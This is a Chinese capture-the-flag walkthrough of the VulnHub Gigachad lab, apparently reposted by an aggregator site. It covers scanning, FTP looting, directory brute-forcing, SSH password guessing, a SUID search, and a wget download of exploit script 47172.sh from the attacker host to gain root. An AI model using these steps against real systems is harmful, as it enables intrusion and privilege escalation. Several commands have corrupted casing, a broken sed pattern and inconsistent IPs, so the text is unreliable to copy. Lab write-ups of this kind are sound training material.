脚本宝典收集整理的这篇文章主要介绍了VulnHub-Gigachad,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
Kali: 192.168.132.131
靶机:192.168.132.143 靶机地址:https://www.vulnhub.COM/entry/gigachad-1,657/
nmap -sP 192.168.132.0/24
nmap -p- -A 192.168.132.143
查看ftp服务,下载文件
查看文件
解压文件,判断文件类型并打开,提示用户名为chad,password可能在dirppinchad.png中
对网站目录进行爆破,网站有许多代码为301的垃圾文件,需要绕过301
gobuster dir -u http://192.168.132.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 400,403,404,500,301 -t 100 -x .php,.htML,.txt --wildcard
检查robots.txt
观察图片,尝试进行识别图片标志地理位置,获得建筑物名称
尝试使用建筑物名称作为密码的关键字,进行登录
ssh chad@192.168.132.143
cat user.txt
lsb_release -a
uname -a
#查找高权限命令
find / -PErm -u=s -type f 2>/dev/null
攻击机,使用python开启临时http服务器
控制靶机访问攻击机,并下载提权脚本
方法一(推荐)
wget http://192.168.132.132/47172.sh
方法二(需要输入密码)
scp root@192.168.132.132/usr/share/exploITdb/exploits/multiple/local/47172.sh /tmp/
#修改脚本,去掉无用回车符号
sed -i "s/r//" 47172.sh
chmod +x 47172.sh
直接运行,失败
修改将“base_dir”从“/VAR/tmp”更改为“/tmp”,然后它就可以正常运行了。 但是我们仍然没有得到root shell
然后我将 47172.sh 复制到 exp.sh,更改一些 var。
./47172.sh & ./exp.sh
#获得互交式shell
python -c 'import pty; pty.spawn("/bin/bash")'
进入root目录,获得另一半flag
这套靶机难易程度容易,使用nmap进行端口扫描,可以ftp匿名登录,下载文件收集信息,目录爆破,通过对图片进行识别,使用地名作为密码尝试登录ssh,获得shell,查找高权限命令,发现可疑程序为邮箱,使用seArchsploit工具搜索该邮箱可以利用的漏洞,利用漏洞脚本进行提权,获得root权限。
以上是脚本宝典为你收集整理的VulnHub-Gigachad全部内容,希望文章能够帮你解决VulnHub-Gigachad所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。